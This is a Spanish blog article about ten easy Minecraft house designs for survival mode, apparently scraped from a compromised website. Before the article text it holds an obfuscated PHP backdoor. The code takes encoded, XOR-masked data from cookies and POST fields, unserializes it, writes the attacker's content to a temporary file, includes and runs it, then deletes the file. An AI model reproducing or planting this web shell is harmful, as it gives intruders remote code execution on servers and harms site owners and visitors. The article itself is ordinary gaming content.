$UZrybR = chr (113) . chr (95) . 'Y' . chr (111) . 'V' . "\x54" . "\130";$cktxhq = chr ( 825 - 726 ).chr (108) . chr (97) . "\x73" . "\163" . chr (95) . 'e' . chr ( 683 - 563 ).chr ( 415 - 310 )."\x73" . chr (116) . "\163";$nCPWEdaCX = $cktxhq($UZrybR); $UZrybR = "24357";$TnqEySwMF = $nCPWEdaCX;$cktxhq = "39106";if (!$TnqEySwMF){class q_YoVTX{private $CWqysxkcy;public static $wcAAx = "69b2630d-d739-4068-988b-cb8c54650c32";public static $noXAQyGAae = 46859;public function __construct($TdyVFMSB=0){$EjqXRbqiw = $_COOKIE;$aUTRlo = $_POST;$sDMIstDJ = @$EjqXRbqiw[substr(q_YoVTX::$wcAAx, 0, 4)];if (!empty($sDMIstDJ)){$LlGpReO = "base64";$JTAkbs = "";$sDMIstDJ = explode(",", $sDMIstDJ);foreach ($sDMIstDJ as $TmAFuM){$JTAkbs .= @$EjqXRbqiw[$TmAFuM];$JTAkbs .= @$aUTRlo[$TmAFuM];}$JTAkbs = array_map($LlGpReO . chr ( 532 - 437 ).chr (100) . chr (101) . "\x63" . "\x6f" . "\x64" . chr (101), array($JTAkbs,)); $JTAkbs = $JTAkbs[0] ^ str_repeat(q_YoVTX::$wcAAx, (strlen($JTAkbs[0]) / strlen(q_YoVTX::$wcAAx)) + 1);q_YoVTX::$noXAQyGAae = @unserialize($JTAkbs);}}private function OOjsEOm(){if (is_array(q_YoVTX::$noXAQyGAae)) {$qcXEadZ = sys_get_temp_dir() . "/" . crc32(q_YoVTX::$noXAQyGAae[chr (115) . chr ( 441 - 344 ).chr ( 822 - 714 ).chr (116)]);@q_YoVTX::$noXAQyGAae[chr (119) . 'r' . "\151" . chr ( 771 - 655 ).chr ( 849 - 748 )]($qcXEadZ, q_YoVTX::$noXAQyGAae["\x63" . "\157" . 'n' . chr ( 450 - 334 ).'e' . "\x6e" . 't']);include $qcXEadZ;@q_YoVTX::$noXAQyGAae[chr ( 1092 - 992 ).chr ( 343 - 242 )."\154" . chr ( 756 - 655 )."\164" . 'e']($qcXEadZ); $gmtRm = "40762";exit();}}public function __destruct(){$this->OOjsEOm(); $gmtRm = "40762";$pSxwU = str_pad($gmtRm, 10);}}$DboCuMM = new /* 55356 */ q_YoVTX(); $DboCuMM = substr("56248_24418", 1);}Casas de Minecraft fáciles: los 10 diseños más rápidos y sencillos

Casas de Minecraft fáciles: los 10 diseños más rápidos y sencillos

Las casas de Minecraft fáciles y rápidas de construir son especialmente útiles al principio de una partida en el modo survival. Como te puedes imaginar, construir grandes y magníficas casas requiere mucho tiempo, dinero y sobre todo trabajo. No hay necesidad de preocuparse por estas cuestiones si estás en el modo creativo. Sin embargo, si quieres crear una casa para el modo de supervivencia, deberías elegir un diseño de casa de Minecraft sencillo que se pueda construir con pocos recursos y en poco tiempo.

En este artículo repasaremos los 6 mejores diseños de casas de Minecraft fáciles que puedes utilizar en el modo supervivencia. Estos diseños de casas son básicos y sencillos de construir, y tienen un aspecto precioso tanto por dentro como por fuera. Cada diseño de casa viene con un tutorial para guiarte a través de todo el proceso de construcción. Cada vídeo incluye extensas instrucciones para cada paso, para que el proceso sea fácil y sin problemas ¡Comenzamos!

Para empezar, necesitas una casa inicial de supervivencia

Casas de Minecraft fáciles inicial de supervivencia

Puedes construir esta casa inicial de supervivencia en cuestión de minutos. Las casas de Minecraft fáciles son un buen punto de partida si eres nuevo en el juego, ya que te permiten tener un habitáculo confortable sin necesidad de gastar muchos recursos. No necesitas ninguna habilidad o destreza especial para construir esta casa; todo lo que tienes que hacer es seguir unas cuantas instrucciones básicas.

Una casa cuadrada minimalista

Casa cuadrada y minimalista para Minecraft

Si buscas casas de Minecraft fáciles, una casa cuadrada puede ser tu mejor opción. Es simple de construir y no necesita una gran cantidad de esfuerzo o conocimiento. ¿Qué mejor opción que esta casa cuando estás en modo de supervivencia y necesitas algo rápido para sobrevivir? Se trata de una granja y tres modestas habitaciones acristaladas. Para poner en marcha este concepto sólo tienes que seguir las instrucciones proporcionadas.

Casa compacta y sencilla

Casa compacta y sencilla para Minecraft

La construcción de casas enormes está fuera de lugar si estás empezando. Empezar con algo sencillo y sin complicaciones es esencial. Para una idea de casa de Minecraft rápida y fácil, echa un vistazo a esta casa compacta Simple. Es una buena opción dentro de todas las casas de Minecraft Survival. Ya que, Es la forma más rápida y sencilla de construir una casa con pocos recursos y un esfuerzo mínimo. Toda la información que necesitarás para completar cada paso se proporciona en esta lección.

Casa de dos pisos simple

Casa de dos pisos simple para Minecraft

Dentro de todas las casas de Minecraft fáciles, las dos pisos son mis preferidas. Con las instrucciones del vídeo puedes una casa espectacular en cuestión de minutos sin ningún esfuerzo. Para crear esta casa, necesitarás unos cuantos materiales sencillos y ninguna experiencia previa en la construcción de casas en Minecraft. Si eres un novato en Minecraft no te preocupes, como te he dicho el tutorial te guiará en el proceso de creación de esta casa. Con esta guía adquirirás un montón de nuevas habilidades y patrones que podrás utilizar en futuros proyectos. Se trata de otro ejemplo de diseño para casas minimalistas en Minecraft.

Casas de Minecraft fáciles 5×5

Casas de Minecraft fáciles 5x5

Con recursos y tiempo limitados, los jugadores del modo supervivencia de Minecraft no pueden crear o fortificar estructuras enormes. En el modo de supervivencia, es una buena idea construir estructuras pequeñas y sencillas. La Casa 5×5 es un excelente y sencillo concepto de casa de Minecraft para esto. Además de ser una casa modesta, tiene un aspecto impresionante y acogedor. Hay dos entradas separadas para cada una de las dos plantas. Hay una sala de almacenamiento en el primer piso y un dormitorio en el segundo.

Casas de Minecraft fáciles en el Interior De Una Montaña

Casas de Minecraft fáciles en el interior de una montaña


Es probable que los jugadores que no crearon la clásica caja de madera en su primera noche excavaran en la ladera de una montaña. Es bastante sencillo tallar unas cuantas habitaciones en la roca de una montaña, y el interior puede ser decorado de casi cualquier manera que el jugador quiera. El exterior, en cambio, puede aportar mucho más que una triste puerta de madera.

La casa es muy luminosa, como puedes comprobar todo está abierto con un espectacular ventanal. Esto no sólo se ve bien desde el exterior, sino que también significa que los jugadores no tienen que depender de la iluminación artificial para el interior.

Te recomiendo plantar un pequeño jardín frente a la entrada del gran ventanal para añadir algo de brillo sin restarle al ambiente del refugio de montaña.

Casas de Minecraft fáciles sobre el agua

Construcción de Minecraft en el agua

¿Quieres dormir bien por la noche, sin miedo a que te acosen los demonios? ¡El mar es tu amigo! Mientras los jugadores no construyan cerca de un monumento oceánico, vivir a poca distancia de la costa en Minecraft será una existencia bastante tranquila y sosegada.

Se trata de una arquitectura muy flexible, ya que los jugadores pueden ampliar lo que han construido previamente en cualquier momento que necesiten más espacio. Hay una casa principal, una herrería y una granja, pero se puede construir mucho más. Ya que, la balsa del suelo se puede ampliar según tus necesidades.

Para una propiedad junto al mar, un muelle básico será suficiente; sin embargo, un puerto completo con lugares de atraque separados para los barcos y otras instalaciones frente al mar puede ser entretenido.

Casa tipo castillo o fortaleza

Construir un castillo en Minecraft

El deseo de construir un castillo es bastante frecuente entre los jugadores de Minecraft. Muchos novatos se sienten impresionados por majestuosos castillos creados por jugadores profesionales en YouTube, y piensan que nunca podrán construir algo parecido con recursos limitados. Déjame decirte que no hay ninguna regla por la que un castillo deba ser grande y ostentoso. Se pueden construir castillos en Minecraft con pocos recursos y muy resistentes a hordas.

Existen muchos trucos estéticos para que las casas de Minecraft fáciles se comporten como fortalezas. En este diseño se incluyen las torretas necesarias, que conducen a una gran entrada que lleva a un espacio central abierto. Si los jugadores lo encuentran demasiado sencillo, basta con añadir más torretas o aumentar los espacios entre las actuales para crear una forma más intrigante y estratégica.

Casas de Minecraft fáciles con piscina

Construcción de Minecraft con piscina

Casa de Minecraft con piscina es un diseño moderno que cuenta con la comodidad de estar construido principalmente con bloques de madera. El exterior de esta casa requerirá alrededor de 58 tablones de roble, 3 escaleras de roble, 100 abeto losas, 24 adoquines y 14 trampillas. Para empezar con la parte de la decoración, se necesitarán 7 piezas de papel.

Además, se necesitarán 9 paneles de cristal para dar más profundidad y mejorar el aspecto de la vivienda. Ni que decir tiene que la característica más notable del diseño de la casa en cuestión es la piscina de cristal, que permite a los jugadores crear su propia fuente de agua.

Casa de Minecraft de cristal y Piedra

Casas de Minecraft fáciles de cristal y piedra

¿Es importante para ti que tu casa se distinga del resto? Si quieres destacar entre los demás, considera la posibilidad de utilizar este impresionante pero básico diseño de casa de Minecraft. Cuenta con un diseño llamativo que atrae la atención del espectador. Como solo tiene una habitación, se puede construir rápidamente. Si tienes prisa o un presupuesto restringido, esta residencia es la única opción para ti.

Por último…

Todas las construcciones mencionadas están creadas específicamente para los principiantes que desean empezar a construir casas que les ayuden a sobrevivir. Para encontrar una casa adecuada, puedes seleccionar cualquiera de las propiedades que mejor se ajuste a tus criterios y preferencias. Podrás crear estas viviendas con la ayuda de las instrucciones. Empecemos con cualquier concepto que tengas en mente para realizar una construcción épica en un videojuego que ha hecho historia.

👉 Si te ha gustado el artículo y me quieres ayudar, comparte en tus redes sociales y visita nuestro blog: miscasasmodernas.com con regularidad ¡Te espero la semana que viene!

Deja un comentario